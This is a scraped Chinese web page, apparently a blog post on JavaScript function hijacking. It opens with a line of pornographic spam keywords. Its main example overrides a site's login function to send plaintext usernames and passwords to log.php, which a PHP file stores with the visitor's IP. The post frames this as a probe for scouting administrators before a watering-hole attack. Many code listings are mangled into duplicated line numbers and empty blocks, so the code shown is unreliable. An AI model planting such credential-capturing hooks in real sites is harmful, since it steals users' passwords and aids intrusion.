日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
JavaScript函數(shù)劫持攻擊原理

JavaScript 函數(shù)劫持并不是什么新穎的技術(shù)了。這兩天在和同事吹牛的過程中提到了這個,就簡單地再回顧回顧,以及假想在攻防的運(yùn)用場景。

JavaScript 函數(shù)劫持(javascript hijacking)簡介

一個簡單的示例如下,主要邏輯就是,用變量 _alert保存原函數(shù) alert,然后重寫 alert 函數(shù),在重寫的函數(shù)最后調(diào)用原函數(shù)。這樣得到的一個效果就是調(diào)用 alert 的時候,可以往 alert 中加入其它操作。比如如下代碼中進(jìn)行一個賦值。

 
 
 
    
  
  
  
  1.  
    2.

日志記錄

這種編程技巧常用于開發(fā)中的日志收集與格式化。既然可以劫持函數(shù)加入自己的操作,那么就可以在比較隱蔽的執(zhí)行一些猥瑣的操作。比如:

https://wiki.jikexueyuan.com/project/brief-talk-js/function-hijacking.html

一文中提到的通過 Hook alert 函數(shù)來記錄調(diào)用情況,或者彈一些警告信息,這樣就可以記錄到測試者的網(wǎng)絡(luò)出口ip、瀏覽器指紋等信息也加上,沒準(zhǔn)就是日后的呈堂證供。

 
 
 
    
  
  
  
  1.    
    2.

探針

在某些場景下,比如:已有權(quán)限,但是數(shù)據(jù)庫中密碼是加密的,無法解開。又或者需要探測目標(biāo)人員訪問此網(wǎng)站的規(guī)律。此時就可以利用劫持登錄函數(shù)來記錄明文的賬號密碼。如下示例:

onclick 事件會調(diào)用 login 函數(shù)發(fā)送請求包:

 
 
 
    
  
  
  
  1.      
    2. 
  
  
  
  2.             
     
    3. 
  
  
  
  3.             
     
    4. 
  
  
  
  4.             submit
     
    5. 
  
  
  
  5.          
    6. 
  
  
  
  6.          
    7.

可以劫持 login 函數(shù),在發(fā)送登陸請求前,先發(fā)到探針文件中做一些記錄帳號密碼等操作。

 
 
 
    
  
  
  
  1. var _login=login; 
    2. 
  
  
  
  2. login = function (){ 
    3. 
  
  
  
  3.     var username = document.getElementById("username").value; 
    4. 
  
  
  
  4.     var password = document.getElementById("password").value; 
    5. 
  
  
  
  5.     $.ajax({ 
    6. 
  
  
  
  6.         url:"log.php", 
    7. 
  
  
  
  7.         type:"POST", 
    8. 
  
  
  
  8.         data:{ 
    9. 
  
  
  
  9.             "username":username, 
    10. 
  
  
  
  10.             "password":password 
    11. 
  
  
  
  11.         }, 
    12. 
  
  
  
  12.         success:console.log("1"), 
    13. 
  
  
  
  13.         error:function(){ 
    14. 
  
  
  
  14.             alert("error"); 
    15. 
  
  
  
  15.         } 
    16. 
  
  
  
  16.     }); 
    17. 
  
  
  
  17.      
    18. 
  
  
  
    19.

log.php 的內(nèi)容如下:

 
 
 
    
  
  
  
  1. 
  
  
  
  2. $username = $_POST["username"]; 
    3. 
  
  
  
  3. $password = $_POST["password"]; 
    4. 
  
  
  
  4. $ip = $_SERVER['REMOTE_ADDR']; 
    5. 
  
  
  
  5. file_put_contents("./log.txt",$username." ".$password." ".$ip); 
    6.

也許在實際中更常見的表單形式應(yīng)該是下面這種。

 
 
 
    
  
  
  
  1.  
    2. 
  
  
  
  2.   
     
    3. 
  
  
  
  3.   
     
    4. 
  
  
  
  4.   
     
    5. 
  
  
  
  5.  
    6.

這種表單也可以通過小小的改動,很簡單的記錄到信息,下面使用的是 onsubmit 事件,用如下方式即可:

 
 
 
    
  
  
  
  1.  
    2. 
  
  
  
  2.      
    3. 
  
  
  
  3.          
    4. 
  
  
  
  4.             
     
    5. 
  
  
  
  5.             
     
    6. 
  
  
  
  6.             
     
    7. 
  
  
  
  7.          
    8. 
  
  
  
  8.          
    9. 
  
  
  
  9.              
    10.

不僅可以記錄密碼,還可以結(jié)合前面提到的記錄日志,來記錄管理員的登錄時間、IP、UA 和瀏覽器指紋等信息。這種探針常用于布置水坑攻擊前針對人員登錄情況的信息收集,根據(jù)收集的信息制定具體的水坑方案。


文章名稱:JavaScript函數(shù)劫持攻擊原理
瀏覽地址:http://www.5511xx.com/article/ccooigj.html